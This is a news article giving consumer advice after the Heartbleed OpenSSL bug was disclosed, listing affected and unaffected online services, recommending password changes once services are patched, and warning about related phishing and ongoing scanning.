As the news of the existence of the Heartbleed bug in OpenSSL and the implications of its existence trickles down into mainstream media, users are trying to figure out what passwords to change and which software to update.
To help with this, SANS keeps a list of vendors who have already issued updates or have noted that they weren’t vulnerable in the first place and, as far as I can tell, Mashable has the most thorough list of Internet services and their current status regarding bug mitigation activities and notes on whether users should proceed to change their passwords on their accounts.
If you are a Facebook, Tumblr, Google, Gmail, Yahoo, Yahoo Mail, AWS, GoDaddy, Intuit, Dropbox, LastPass, OKCupid, SoundCloud, or Wunderlist user, go change your password immediately, and make it good (long, complex and unique). This would also be a good time to start considering the use of a password vault tools or services.
Services that claim not to have been affected include LinkedIn, Amazon, Microsoft, AOL, Hotmail/Outlook, PayPal, Target, a variety of big US banks, Evernote, and several more. Still, if you’re not the type to change your passwords often, it might be a good idea – while you’re at it – to change them for these accounts now as well.
If you are not sure whether an online service has moved to fix the hole, you can always check via one of several online checkers for the Heartbleed bug. Changing your password before a service has done the cleaning up is pointless – wait until they do.
Some services will notify you directly of the changes, and will urge you to change your passwords. But beware! The current situation will surely be exploited by phishers looking to impersonate legitimate services and trick users into sharing their login credentials.
If you receive such an email (whether legitimate or a phishing one), avoid clicking on links contained within, and change your password by accessing your account via the official login page visited by following a bookmark or by entering the URL in the browser’s address bar yourself.
Check with your bank whether they have fixed the problem on their online banking website before accessing it again, and check your bank account and payment card statements regularly for fraudulent transactions.
The chances that random attackers have been misusing the bug to steal information so far is extremely small, but according to Kaspersky Lab researchers, since the revelation of its existence, state-sponsored hacker groups have begun running automated scans to search for Internet-facing servers using OpenSSL.
Unfortunately, as we already know, the attack does not leave a trace in the logs, so it’s impossible to tell which (if any) servers have been compromised.
It’s also difficult (if not impossible) to tell for sure whether intelligence agencies around the world – and especially the NSA – knew about this bug and exploited it. Wired’s Kim Zetter has penned a good article about the likelihood of that, and Ars Technica’s Sean Gallagher has some details about the attack possibilities and effective potential of the exploitation of the bug.
Finally, we can be sure that the repercussions of this discovery will reverberate for a while, as SANS faculty member Jake Williams has demonstrated that vulnerable client-side OpenSSL implementations – in software on smartphones, computers, routers, etc. – can be targeted using malicious servers.